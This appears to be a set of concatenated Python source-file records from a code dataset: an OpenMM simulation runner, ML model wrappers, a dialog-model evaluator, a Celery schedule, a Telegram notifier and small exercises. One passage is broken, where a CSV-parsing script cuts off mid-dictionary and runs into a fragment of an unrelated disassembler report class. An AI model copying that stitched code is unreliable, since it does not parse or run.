'--pdb', dest='pdb', metavar='', required=True,\n help='''PDB file with coordinates for all atoms. 
Is also the\n reference coordinates''')\ngroup.add_argument('-s', '--state', dest='state', metavar='FILE', default=None,\n help='''Restart file (any format)''')\ngroup = parser.add_argument_group('Positional Restraint Options')\ngroup.add_argument('--restrain', dest='restraints', metavar='MASK',\n help='restraint mask (default None)', default=None)\ngroup.add_argument('-k', '--force-constant', dest='force_constant', type=float,\n metavar='FLOAT', help='''Force constant for cartesian\n constraints. Default 10 kcal/mol/A^2''', default=10)\ngroup = parser.add_argument_group('Output File Options')\ngroup.add_argument('-r', '--restart', dest='restart', default='restart.nc',\n metavar='FILE', help='''NetCDF file with information to\n restart the simulation with another run''')\ngroup.add_argument('-o' , '--output', dest='output', default=sys.stdout,\n metavar='FILE', help='''Output file for energies''')\ngroup.add_argument('-x', '--trajectory', dest='trajectory', default='md.nc',\n metavar='FILE', help='''NetCDF trajectory to generate.\n Snapshots written every 10 * --interval steps.''')\ngroup.add_argument('--checkpoint', dest='checkpoint', metavar='FILE',\n default=None, help='''Name of a checkpoint file to write\n periodically throughout the simulation. Primarily useful for\n debugging intermittent and rare errors.''')\ngroup.add_argument('--interval', dest='interval', default=500, metavar='INT',\n help='Interval between printing state data. Default 500',\n type=int)\ngroup = parser.add_argument_group('Simulation Options')\ngroup.add_argument('-n', '--num-steps', dest='num_steps', required=True, type=int,\n help='Number of MD steps to run. Required', metavar='INT')\ngroup.add_argument('--ntp', dest='ntp', default=False, action='store_true',\n help='Do constant pressure simulation')\ngroup.add_argument('--aniso', dest='aniso', default=False, action='store_true',\n help='Do anisotropic pressure scaling')\ngroup.add_argument('--dt', dest='timestep', type=float,\n metavar='FLOAT', help='''time step for integrator (outer\n time-step for RESPA integrator) Default 1 fs''', default=1.0)\ngroup.add_argument('--tfreq', dest='tfreq', type=float,\n metavar='FLOAT', help='''frequency for Andersen thermostat.\n Default 0.1 ps^-1''', default=0.1)\ngroup.add_argument('--nrespa', dest='nrespa', type=int, metavar='INT',\n default=1, help='''Number of inner time steps to run\n (evaluating fast forces) for every outer timestep. Default is\n 1 (no RESPA). Best value to use for AMOEBA is at most 2. Only\n AMOEBA is supported.''')\ngroup.add_argument('--gamma_ln', dest='gamma_ln', type=float,\n metavar='FLOAT', help='''collision frequency for Langevin\n integrator. Default %(default)s ps-1''', default=0.0)\ngroup.add_argument('--temp', dest='temp', type=float,\n metavar='FLOAT', help='''target temperature for NVT\n simulation. Default %(default)s K''', default=300.0)\ngroup.add_argument('--nve', dest='nve', default=False, action='store_true',\n help='Do constant energy simulation')\ngroup.add_argument('--watch-for-errors', dest='hawkeye', default=False,\n action='store_true',\n help='''Watch energy every step and if energy becomes large\n or NaN, print out each component to find where the energy is\n blowing up. 
This may slow the simulation down considerably,\n so it is primarily of use when debugging.''')\n\nopt = parser.parse_args()\n\nprint('Command line:\\n\\t%s' % ' '.join(sys.argv)); sys.stdout.flush()\n\nprint('Parsing XML file %s' % opt.xml); sys.stdout.flush()\nwith open(opt.xml, 'r') as f:\n system = mm.XmlSerializer.deserialize(f.read())\n\nif opt.hawkeye:\n if opt.nrespa > 1:\n raise ValueError('Cannot use MTS integrator and watch for errors')\n groups_and_names = []\n for i, force in enumerate(system.getForces()):\n# if isinstance(force, mm.AmoebaMultipoleForce):\n# # Skip the multipole force, since it's so expensive\n# force.setForceGroup(20)\n# continue\n groups_and_names.append((type(force).__name__, i))\n force.setForceGroup(i)\n \n class ErrorDetectionReporter(app.StateDataReporter):\n def __init__(self, groups_and_names):\n self._reportInterval = 1\n self.groups_and_names = groups_and_names\n\n def describeNextReport(self, simulation):\n \"\"\"Get information about the next report this object will generate.\n \n Parameters\n ----------\n simulation : Simulation\n The Simulation to generate a report for\n \n Returns\n -------\n tuple\n A five element tuple. The first element is the number of steps\n until the next report. The remaining elements specify whether\n that report will require positions, velocities, forces, and\n energies respectively.\n \"\"\"\n return 1, False, False, False, True # only need energies\n\n def report(self, simulation, state):\n ene = state.getPotentialEnergy().value_in_unit(u.kilojoules_per_mole)\n if not math.isnan(ene) and ene < 1e5:\n return\n print('%30s %.6f kcal/mol' % ('Total Energy', ene))\n for name, i in self.groups_and_names:\n ene = simulation.context.getState(getEnergy=True, groups=1< 0.0:\n if opt.nrespa > 1:\n integrator = MTSVVVRIntegrator(opt.temp*u.kelvin,\n opt.gamma_ln/u.picosecond, opt.timestep*u.femtoseconds,\n system, opt.nrespa)\n print('MTSVVVR: %8.2fK, %8.2f ps-1, %8.2f fs, %3d inner steps' %\n (opt.temp, opt.gamma_ln, opt.timestep, opt.nrespa) ); sys.stdout.flush()\n else:\n integrator = mm.LangevinIntegrator(opt.temp*u.kelvin,\n opt.gamma_ln/u.picosecond, opt.timestep*u.femtoseconds)\n print('Langevin: %8.2fK, %8.2f ps-1, %8.2f fs' %\n (opt.temp, opt.gamma_ln, opt.timestep) ); sys.stdout.flush()\nelif opt.nrespa > 1:\n slow = (mm.AmoebaMultipoleForce, mm.AmoebaVdwForce,\n mm.AmoebaGeneralizedKirkwoodForce, mm.AmoebaWcaDispersionForce)\n found_slow = False\n for force in system.getForces():\n if isinstance(force, slow):\n found_slow = True\n force.setForceGroup(1)\n else:\n force.setForceGroup(0)\n if not found_slow:\n raise ValueError('No slow AMOEBA forces found for MTS integrator!')\n # The list given to MTSIntegrator defining the time steps and force\n # decompositions is a list of 2-element tuples where the first element is\n # a force group and the second element is how many times to evaluate that\n # force group each \"outer\" time-step. So [(0, opt.nrespa), (1, 1)] means\n # force group 0 is executed nrespa times each time step and force group 1 is\n # executed only once. 
The slow forces are defined above as force group 1 and\n # all others as force group 0.\n integrator = mm.MTSIntegrator(opt.timestep*u.femtoseconds,\n [(0, opt.nrespa), (1, 1)])\n print('RESPA MTS Integrator: %8.2f fs outer time-step with %d inner steps' %\n (opt.timestep, opt.nrespa))\nelse:\n integrator = mm.VerletIntegrator(opt.timestep*u.femtoseconds)\n print('Verlet: %8.2f fs' % opt.timestep )\n\nsim = app.Simulation(pdb.topology, system, integrator,\n platform=mm.Platform.getPlatformByName('CUDA'),\n platformProperties=dict(CudaPrecision='mixed') )\n\nif opt.hawkeye:\n # Watch every step... slow!\n sim.reporters.append(ErrorDetectionReporter(groups_and_names))\n\nsim.reporters.append(\n pmd.openmm.StateDataReporter(opt.output, reportInterval=opt.interval,\n volume=True,density=True,separator='\\t')\n)\nsim.reporters.append(\n pmd.openmm.ProgressReporter(opt.output + '.info', opt.interval, opt.num_steps)\n)\nsim.reporters.append(\n pmd.openmm.NetCDFReporter(opt.trajectory, opt.interval*10)\n)\nsim.reporters.append(\n pmd.openmm.RestartReporter(opt.restart, 99999999, netcdf=True)\n)\nif opt.checkpoint is not None:\n sim.reporters.append(\n app.CheckpointReporter(opt.checkpoint, opt.interval*10)\n )\n\nif opt.state is not None:\n print('Setting coordinates and velocities from restart file %s' %\n opt.state); sys.stdout.flush()\n\n if opt.state[-3:] == 'xml':\n with open(opt.state, 'r') as f:\n sim.context.setState(mm.XmlSerializer.deserialize(f.read()))\n elif opt.state[-3:] == 'chk':\n sim.loadCheckpoint(opt.state)\n else:\n# jason's code that is supposed to work for any restart file type:\n rst = pmd.load_file(opt.state)\n sim.context.setPositions(rst.coordinates[-1]*u.angstroms)\n sim.context.setVelocities(rst.velocities[-1]*u.angstroms/u.picoseconds)\n sim.context.setPeriodicBoxVectors(*pmd.geometry.box_lengths_and_angles_to_vectors(*rst.box))\n if hasattr(rst, 'time'):\n try:\n sim.context.setTime(rst.time[-1])\n except TypeError:\n sim.context.setTime(rst.time)\n\nelse:\n print('Setting coordinates from PDB file %s' % opt.pdb); sys.stdout.flush()\n sim.context.setPositions(pdb.positions)\n sim.context.setVelocitiesToTemperature(opt.temp)\n\nprint('Running the simulation for %d steps!' % opt.num_steps); sys.stdout.flush()\nsim.step(opt.num_steps)\n\n# The last step may not have resulted in a restart file being written. 
Force it\n# here\nstate = sim.context.getState(getPositions=True, getVelocities=True,\n getEnergy=True, getForces=True,\n enforcePeriodicBox=system.usesPeriodicBoundaryConditions())\nfor rep in sim.reporters:\n if isinstance(rep, pmd.openmm.RestartReporter):\n rep.report(sim, state)\n","sub_path":"runmd.py","file_name":"runmd.py","file_ext":"py","file_size_in_byte":16930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"404822902","text":"from time import sleep\r\n\r\nfrom bot_utils import click\r\nfrom examples.smt_dx2.images import Images\r\n\r\n\r\n# constants\r\nclass Time:\r\n ui_load = 1.2\r\n processed = 1.8\r\n\r\n\r\ndef get_summon_files(amount=1):\r\n for i in range(amount):\r\n sleep(0.1)\r\n click(Images.exchange_100)\r\n sleep(Time.ui_load)\r\n click(Images.exchange_100)\r\n\r\n sleep(Time.ui_load)\r\n click(Images.close)\r\n\r\n sleep(Time.processed)\r\n\r\n\r\nif __name__ == '__main__':\r\n get_summon_files(20)\r\n","sub_path":"examples/smt_dx2/exchange/fame.py","file_name":"fame.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"453409843","text":"from keras.models import Model\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree.export import export_text\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\nclass MVAModel(object):\n def __init__(self, name, binary):\n self.name = name\n self.binary = binary\n self.feature_sets = {}\n\n def add_feature_set(self, feature_set_name, feature_set):\n self.feature_sets[feature_set_name] = feature_set\n\nclass KerasModel(MVAModel):\n def __init__(self, name, arch, batch_size, epochs, loss, optimizer, binary = False):\n super().__init__(name, binary)\n self.architecture = arch\n self.batch_size = batch_size\n self.epochs = epochs\n self.loss = loss\n self.optimizer = optimizer\n self.model = {}\n self.history = {}\n\n def train(self, x_train, y_train, feature_set_name, model_dir, prefix, weights=None):\n print(\"Considering model {0} with feature set {1}\".format(self.name, feature_set_name))\n feature_set = x_train.columns\n if feature_set_name not in self.feature_sets.keys():\n self.add_feature_set(feature_set_name, feature_set)\n label = self.name+\"_\"+feature_set_name\n inputs, outputs = self.architecture(label=label, input_dim=len(feature_set))\n self.model[feature_set_name] = Model(inputs=inputs, outputs=outputs)\n self.model[feature_set_name].compile(loss=self.loss, optimizer=self.optimizer, metrics=[\"accuracy\"])\n self.model[feature_set_name].summary()\n self.history[feature_set_name] = self.model[feature_set_name].fit(\n x_train,\n y_train,\n epochs=self.epochs,\n batch_size=self.batch_size,\n verbose=1,\n validation_split=0.2,\n shuffle=True)\n self.model[feature_set_name].save('{0}/{1}_{2}.h5'.format(model_dir, prefix, label))\n\n def predict(self, x_test, y_test, feature_set_name):\n if self.binary:\n if \"resweights\" in self.name:\n return self.model[feature_set_name].predict(x_test)[:,0].ravel()\n else:\n return self.model[feature_set_name].predict(x_test).ravel()\n else:\n vbf_pred = self.model[feature_set_name].predict(x_test)[:,0].ravel()\n ggh_pred = self.model[feature_set_name].predict(x_test)[:,1].ravel()\n dy_pred = self.model[feature_set_name].predict(x_test)[:,2].ravel()\n ewk_pred = self.model[feature_set_name].predict(x_test)[:,3].ravel()\n ttbar_pred = self.model[feature_set_name].predict(x_test)[:,4].ravel()\n return 
[vbf_pred, ggh_pred, dy_pred, ewk_pred, ttbar_pred]\n\n\nclass SklearnBdtModel(MVAModel):\n def __init__(self, name, max_depth, binary):\n super().__init__(name, binary)\n self.model = {}\n self.max_depth = max_depth\n\n def train(self, x_train, y_train, feature_set_name, model_dir, prefix, weights=None):\n feature_set = x_train.columns\n print(\"Considering model {0} with feature set {1}\".format(self.name, feature_set_name))\n if feature_set_name not in self.feature_sets.keys():\n self.add_feature_set(feature_set_name, feature_set)\n model = DecisionTreeClassifier(random_state=0, max_depth=self.max_depth)\n self.model[feature_set_name] = model.fit(x_train, y_train)\n\n def predict(self, x_test, y_test, feature_set_name):\n return self.model[feature_set_name].predict_proba(x_test)[:,1].ravel()\n\n\nclass TfBdtModel(MVAModel):\n def __init__(self, name, n_trees, max_depth, max_steps, batch_size, tree_complexity, pruning, lr, bpl, weighted=False):\n super().__init__(name, binary=True)\n self.model = {}\n self.n_trees = n_trees\n self.max_depth = max_depth\n self.max_steps = max_steps\n self.batch_size = batch_size\n self.tree_complexity = tree_complexity\n self.weighted = weighted\n self.pruning = pruning\n self.lr = lr\n self.bpl = bpl\n\n def make_input_fn(self, X, y, training=False):\n def input_fn():\n dataset = tf.data.Dataset.from_tensor_slices((X.to_dict(orient='list'), y))\n if training:\n batch_size = self.batch_size\n dataset = dataset.shuffle(batch_size)\n dataset = dataset.repeat(None)\n else:\n batch_size = len(y)\n dataset = dataset.repeat(1)\n dataset = dataset.batch(batch_size)\n return dataset\n return input_fn\n\n\n def train(self, x_train, y_train, feature_set_name, model_dir, prefix, weights=None):\n feature_set = x_train.columns\n self.nsamples = len(y_train)\n print(\"Considering model {0} with feature set {1}\".format(self.name, feature_set_name))\n if feature_set_name not in self.feature_sets.keys():\n self.add_feature_set(feature_set_name, feature_set)\n feature_columns = []\n for feature_name in feature_set:\n feature_columns.append(tf.feature_column.numeric_column(feature_name))\n if self.weighted and (not weights.empty):\n weight_column = tf.feature_column.numeric_column('weight')\n x_train_w = x_train\n x_train_w['weight'] = weights.values\n else:\n weight_column = None\n self.model[feature_set_name] = tf.estimator.BoostedTreesClassifier(feature_columns=feature_columns, \n weight_column=weight_column,\n n_batches_per_layer=self.bpl, \n n_trees=self.n_trees, \n max_depth=self.max_depth,\n learning_rate=self.lr,\n center_bias = True,\n tree_complexity = self.tree_complexity,\n pruning_mode=self.pruning\n )\n\n if (self.weighted) and (not weights.empty):\n self.model[feature_set_name].train(self.make_input_fn(x_train_w, y_train, training=True), max_steps=self.max_steps)\n else:\n self.model[feature_set_name].train(self.make_input_fn(x_train, y_train, training=True), max_steps=self.max_steps)\n\n\n def predict(self, x_test, y_test, feature_set_name):\n\n pred_dicts = list(self.model[feature_set_name].predict(self.make_input_fn(x_test, y_test, training=False), yield_single_examples=False ))\n probs = pd.DataFrame(pred_dicts[0]['probabilities'])\n\n return probs[1].ravel()\n","sub_path":"tests/hmm/mva/mva_models.py","file_name":"mva_models.py","file_ext":"py","file_size_in_byte":7139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588579166","text":"from __future__ import print_function\n\nimport os\nfrom 
argparse import ArgumentParser\nimport random\nimport sys\nimport json\n\nimport numpy as np\nimport tensorflow as tf\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom modules.entities import EntityTracker\nfrom modules.hierarchical_lstm_v2 import HierarchicalLSTMv2\nfrom modules.actions import ActionTracker\nfrom modules.util import read_dialogs, get_utterances, load_model\nfrom modules.evaluation import evaluate, evaluate_advanced, mark_post_ood_turns\nfrom utils.training_utils import batch_generator\nfrom utils.preprocessing import make_dataset_for_hierarchical_hcn, make_vocabulary, PAD_ID, UNK_ID, BoW_encoder\nfrom babi_tools.ood_augmentation import DEFAULT_CONFIG_FILE\n\nrandom.seed(273)\nnp.random.seed(273)\ntf.set_random_seed(273)\n\nwith open(DEFAULT_CONFIG_FILE) as babi_config_in:\n BABI_CONFIG = json.load(babi_config_in)\n\n\ndef main(in_clean_dataset_folder, in_noisy_dataset_folder, in_model_folder, in_no_ood_evaluation):\n rev_vocab, kb, action_templates, config = load_model(in_model_folder)\n clean_dialogs, clean_indices = read_dialogs(os.path.join(in_clean_dataset_folder, 'dialog-babi-task6-dstc2-tst.txt'),\n with_indices=True)\n noisy_dialogs, noisy_indices = read_dialogs(os.path.join(in_noisy_dataset_folder, 'dialog-babi-task6-dstc2-tst.txt'),\n with_indices=True)\n\n max_noisy_dialog_length = max([item['end'] - item['start'] + 1 for item in noisy_indices])\n config['max_input_length'] = max_noisy_dialog_length\n post_ood_turns_clean, post_ood_turns_noisy = mark_post_ood_turns(noisy_dialogs, BABI_CONFIG['backoff_utterance'].lower())\n\n et = EntityTracker(kb)\n at = ActionTracker(None, et)\n at.set_action_templates(action_templates)\n\n vocab = {word: idx for idx, word in enumerate(rev_vocab)}\n dataset_clean = make_dataset_for_hierarchical_hcn(clean_dialogs,\n clean_indices,\n vocab,\n et,\n at,\n **config)\n dataset_noisy = make_dataset_for_hierarchical_hcn(noisy_dialogs,\n noisy_indices,\n vocab,\n et,\n at,\n **config)\n context_features_clean, action_masks_clean = dataset_clean[1:3]\n net = HierarchicalLSTMv2(config, context_features_clean.shape[-1], action_masks_clean.shape[-1], vocab)\n net.restore(in_model_folder)\n eval_stats_clean = evaluate_advanced(net,\n dataset_clean,\n at.action_templates,\n BABI_CONFIG['backoff_utterance'].lower(),\n post_ood_turns=post_ood_turns_clean)\n print('Clean dataset: {} turns overall'.format(eval_stats_clean['total_turns']))\n print('Accuracy:')\n accuracy = eval_stats_clean['correct_turns'] / eval_stats_clean['total_turns']\n accuracy_post_ood = eval_stats_clean['correct_post_ood_turns'] / eval_stats_clean['total_post_ood_turns'] \\\n if eval_stats_clean['total_post_ood_turns'] != 0 \\\n else 0\n print('overall: {:.3f}; directly post-OOD: {:.3f}'.format(accuracy, accuracy_post_ood))\n print('Loss : {:.3f}'.format(eval_stats_clean['avg_loss']))\n\n eval_stats_noisy = evaluate_advanced(net,\n dataset_noisy,\n at.action_templates,\n BABI_CONFIG['backoff_utterance'].lower(),\n post_ood_turns=post_ood_turns_noisy)\n print('\\n\\n')\n print('Noisy dataset: {} turns overall, {} turns after the first OOD'.format(eval_stats_noisy['total_turns'],\n eval_stats_noisy['total_turns_after_ood']))\n print('Accuracy:')\n accuracy = eval_stats_noisy['correct_turns'] / eval_stats_noisy['total_turns']\n accuracy_after_ood = eval_stats_noisy['correct_turns_after_ood'] / eval_stats_noisy['total_turns_after_ood'] \\\n if eval_stats_noisy['total_turns_after_ood'] != 0 \\\n else 0\n accuracy_post_ood = 
eval_stats_noisy['correct_post_ood_turns'] / eval_stats_noisy['total_post_ood_turns'] \\\n if eval_stats_noisy['total_post_ood_turns'] != 0 \\\n else 0\n accuracy_ood = eval_stats_noisy['correct_ood_turns'] / eval_stats_noisy['total_ood_turns'] \\\n if eval_stats_noisy['total_ood_turns'] != 0 \\\n else 0\n print('overall: {:.3f}; after first OOD: {:.3f}; directly post-OOD: {:.3f}; OOD: {:.3f}'.format(accuracy,\n accuracy_after_ood,\n accuracy_post_ood,\n accuracy_ood))\n print('Loss : {:.3f}'.format(eval_stats_noisy['avg_loss']))\n\n if in_no_ood_evaluation:\n eval_stats_no_ood = evaluate_advanced(net,\n dataset_noisy,\n at.action_templates,\n BABI_CONFIG['backoff_utterance'].lower(),\n post_ood_turns=post_ood_turns_noisy,\n ignore_ood_accuracy=True)\n print('Accuracy (OOD turns ignored):')\n accuracy = eval_stats_no_ood['correct_turns'] / eval_stats_no_ood['total_turns']\n accuracy_after_ood = eval_stats_no_ood['correct_turns_after_ood'] / eval_stats_no_ood['total_turns_after_ood'] \\\n if eval_stats_no_ood['total_turns_after_ood'] != 0 \\\n else 0\n accuracy_post_ood = eval_stats_no_ood['correct_post_ood_turns'] / eval_stats_no_ood['total_post_ood_turns'] \\\n if eval_stats_no_ood['total_post_ood_turns'] != 0 \\\n else 0\n print('overall: {:.3f}; after first OOD: {:.3f}, directly post-OOD: {:.3f}'.format(accuracy, accuracy_after_ood, accuracy_post_ood))\n\n\ndef configure_argument_parser():\n result_parser = ArgumentParser('Evaluate a trained Hybrid Code Network on bAbI Dialog Tasks data')\n result_parser.add_argument('clean_dataset_folder')\n result_parser.add_argument('noisy_dataset_folder')\n result_parser.add_argument('model_folder')\n result_parser.add_argument('--perform_no_ood_eval', default=False, action='store_true')\n return result_parser\n\n\nif __name__ == '__main__':\n parser = configure_argument_parser()\n args = parser.parse_args()\n\n main(args.clean_dataset_folder, args.noisy_dataset_folder, args.model_folder, args.perform_no_ood_eval)\n\n","sub_path":"hcn/__archive/evaluate_hierarchical_hcn_v2.py","file_name":"evaluate_hierarchical_hcn_v2.py","file_ext":"py","file_size_in_byte":7252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"410151865","text":"import requests\n\nfrom config import BOT\n\n\nclass Bot:\n @staticmethod\n def notify(message):\n requests.get(\n 'https://api.telegram.org/%s/sendMessage' % BOT['token'],\n params={'chat_id': BOT['chat'], 'text': message, 'parse_mode': 'HTML'}\n )\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"459525749","text":"from __future__ import absolute_import, unicode_literals\n\nimport os\nfrom celery.schedules import crontab\n\nfrom celery import Celery\nfrom django.conf import settings\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Timer.settings')\n\napp = Celery('Timer',\n include = ['core.tasks']\n )\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request))\n\n\n#\n# CELERY_BROKER_URL = 'amqp://guest:guest@localhost//'\n#\n# #: Only add pickle to this list if your broker is secured\n# #: from unwanted access (see userguide/security.html)\n# CELERY_ACCEPT_CONTENT = ['json']\n# CELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite'\n# CELERY_TASK_SERIALIZER = 
'json'\n\n\"\"\"\nif settings.PROD:\n app.conf.update(\n BROKER_URL='amqp://guest:guest@88.99.142.165:5672/',\n CELERYBEAT_SCHEDULER='django_celery_beat.schedulers:DatabaseScheduler',\n CELERY_RESULT_BACKEND='django-db',\n CELERY_DISABLE_RATE_LIMITS=True,\n CELERY_ACCEPT_CONTENT=['json', ],\n CELERY_TASK_SERIALIZER='json',\n CELERY_RESULT_SERIALIZER='json',\n )\nelse:\n app.conf.update(\n BROKER_URL='amqp://guest:guest@localhost:5672/',\n CELERYBEAT_SCHEDULER='django_celery_beat.schedulers:DatabaseScheduler',\n CELERY_RESULT_BACKEND='django-db',\n CELERY_DISABLE_RATE_LIMITS=True,\n CELERY_ACCEPT_CONTENT=['json', ],\n CELERY_TASK_SERIALIZER='json',\n CELERY_RESULT_SERIALIZER='json',\n )\n\n\"\"\"\n\n\n\napp.conf.beat_schedule = {\n 'last_five_days': {\n 'task': \"core.tasks.ten_days_left\",\n 'schedule': crontab(hour=10, minute=10, day_of_week='mon-sun'),\n },\n 'last_three_days:': {\n 'task': 'core.tasks.five_days_left',\n 'schedule': crontab(hour=10, minute=10, day_of_week='0-6'),\n },\n 'today_payment_day:': {\n 'task': 'core.tasks.today_is_project_day',\n 'schedule': crontab(hour=10, minute=10, day_of_week='mon-sun'),\n },\n \n}\n\n\n ","sub_path":"Timer/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"46047719","text":"import math\r\n\r\n\r\ndef calculate_angle(point1, point2):\r\n p1 = (0, 0)\r\n # p2 is now a vector from point1 to point2\r\n p2 = (point2[0]-point1[0], point2[1]-point1[1])\r\n # The math.atan2() method returns a numeric value between -π and π representing the angle theta of an (x, y) point.\r\n ang1 = math.atan2(p1[1], p1[0])\r\n ang2 = math.atan2(p2[1], p2[0])\r\n angle = ((ang2 - ang1) * (180.0 / 3.141592653589793))\r\n # Return only positive angle\r\n if angle < 0:\r\n angle += 360\r\n print(angle)\r\n return angle\r\n\r\n\r\nPoint1 = []\r\nPoint2 = []\r\n\r\nPoint1.append(int(input(\"First point x: \")))\r\nPoint1.append(int(input(\"First point y: \")))\r\nPoint2.append(int(input(\"Second point x: \")))\r\nPoint2.append(int(input(\"Second point y: \")))\r\n\r\nprint(\"Angle between points = \"+str(calculate_angle(Point1,Point2)))","sub_path":"Angle between 2 coordinates in 2D plane/calculate_angle.py","file_name":"calculate_angle.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127343760","text":"#Task 18\r\n#Compulsory Task\r\n\r\n#This program reads the data from the text file called DOB.txt and prints it out in two different sections i.e \"Names\" and \"Birth date\"\r\nFile = open('DOB.txt','r+')\r\n#AllContents = File.read() #read everyting in File DOB\r\nNames = [] #This is a list that will store all the names read from the DOB text file\r\nDOB = [] #This is a list that will store all the DOB's read from the DOB text file\r\nn=1\r\nm=1\r\nfor line in File:\r\n Line = line.strip() # strip any white spaces\r\n Line = line.split() #split the line into pieces\r\n #each line is split into 5 pieces - the first two pieces will be the name and surname while the 3rd,4th and 5th pieces will be the Birth Date\r\n Names.append(Line[0] + \" \" + Line[1]) #Add the first 2 pieces into the Names list.\r\n DOB.append(Line[2] + \" \" + Line[3] + \" \" + Line[4]) #Add the last 3 pieces into the DOB list.\r\n\r\nprint(\"Names:\")\r\nfor i in Names: #print each name in the list on a seperate line\r\n print(\"\\t\" + str(n) + \". 
\" + i) #i is the same as Names[i] in an array.\r\n n+=1\r\n\r\n\r\nprint(\"\\nBirth Date:\\n\")\r\n#m=1\r\nfor j in DOB:\r\n print(\"\\t\" + str(m) + \". \" + j)\r\n m+=1\r\n\r\n \r\n\r\nFile.close()\r\n","sub_path":"Read from DOB text File.py","file_name":"Read from DOB text File.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"76099127","text":"# 9-12. Multiple Modules: Store the User class in one module, and store the\n# Privileges and Admin classes in a separate module. In a separate file, create\n# an Admin instance and call show_privileges() to show that everything is still\n# working correctly.\n\n\nfrom user_module import User\nfrom privileges_modules import Privileges\nfrom admin_module import Admin\n\nadminKen = Admin('kenneth', 'chang', 'antdoggy', 'k_chang@gmail.com',\n 'taipei')\nadminKen.describe_user()\n\nken_privileges = [\n 'can scrape the entire database',\n 'can delete accounts based on his mood',\n 'can sell user data',\n ]\nadminKen.privileges.privileges = ken_privileges\n\nprint(\"\\nThe Admin \" + adminKen.username + \" has the following privileges: \")\nadminKen.privileges.show_privileges()\n","sub_path":"Chapter-9/9-12tryityourself.py","file_name":"9-12tryityourself.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"441570334","text":"import re\n\nstring = 'Some 25/4, Foo 34/56, Bar 56/11'\n\nprint([\n r.groupdict()\n for r in re.finditer(\n r'(?P[A-Za-z]+)\\s(?P\\d+)/(?P\\d+)',\n string\n )])\n\n_re = re.compile(r'(?P[A-Za-z]+)\\s(?P\\d+)/(?P\\d+)')\nfor r in _re.finditer(string):\n print(r.groupdict())\n\n_re = re.compile(r'(?P[A-Za-z]+)\\s(?P\\d+)/(?P\\d+)')\n# _re = re.compile(r'([A-Za-z]+)\\s(\\d+)/(\\d+)')\nfor r in _re.finditer(string):\n print(r.group(1), r.group(2), r.group(3))\n print(r.group('street'), r.group('house'), r.group('flat'))\n print('-----------------')\n","sub_path":"classwork/regexp/finditer.py","file_name":"finditer.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622987205","text":"import csv\nimport numpy as np\n\n\ndef create_empty(data_type, size):\n return np.zeros(shape=(size), dtype=data_type)\n\n\ndef process_csv(filename, data, converters, size=10):\n # \"with\" context manager as:\n # 1. it is safer and can avoid errors\n # 2. 
is generally a better idea to use than opening a file manually\n with open(filename, \"r\") as file:\n # csv module reader as it does a lot of processing for us automatically\n # and is a lot more efficient.\n contents = csv.reader(file)\n\n # next() instead of pop() when working with the csv reader rather than a list\n column_names = next(contents)\n\n # Loop through the data and create starting np.arrays to hold the data\n for d in data:\n data_type = data[d]\n data[d] = create_empty(data_type, size)\n\n\n # Counter to keep track of the number of rows processed\n counter = 0\n\n # Loop through the rows of the data\n for i, values in enumerate(contents):\n\n if len(values) == 0 or len(values) == 1:\n continue\n \n # Check if we have filled all empty spaces in the array, if so\n # add more empties and reset counter\n if counter == size:\n counter = 0\n # Loop through all columns in the data\n for d in data:\n # Create new empty space for each.\n data_type = data[d].dtype\n new_space = create_empty(data_type, size) # Create the new spaces\n extended_array = np.concatenate([data[d], new_space]) # Add the new spaces to the old array\n data[d] = extended_array\n\n # Loop through all column names, check if the column is present in our\n # data structure. If so, apply the converter function and save into the data.\n for name, value in zip(column_names, values):\n if name in data.keys():\n converting_function = converters[name]\n\n converted_value = converting_function(value)\n\n # data[name].append(converted_value)\n \n data[name][i] = converted_value\n \n counter += 1\n\n\n\n\ndata = {\n \"order\": \"int32\",\n \"name\": \"6.3f}s -> (architecture: {}.{}bit, base_addr: 0x{:08x}): {} functions\".format(self.execution_time, self.architecture, self.bitness, self.base_addr, len(self.xcfg))\n","sub_path":"smda/common/SmdaReport.py","file_name":"SmdaReport.py","file_ext":"py","file_size_in_byte":6846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"262651740","text":"import keyword\nimport re\n\ndef func_while(l):\n temp = l.replace(\" \",\"\")\n line = temp[0:5]+\" \"+temp[5:]\n if(temp[5] == '('):\n if(temp[-2:] != '):'):\n line = line[:-2] + \"):\"\n elif(temp[-1:] == \":\" and temp[-2:-1] != ')'):\n line = line[:-2] + \"):\"\n elif(temp[-2:-1] == \")\" and temp[5] != \"(\"):\n line = line[:5]+\"(\"+line[5:]\n if(line[-1:] != \":\"):\n line = line + \":\"\n elif(temp[5] != \"(\" and temp[-2:-1] != \")\"):\n if(temp[-1:] != \":\"):\n line = line + \":\"\n return line\n\ndef func_for(l):\n temp = l.replace(\" \",\"\")\n 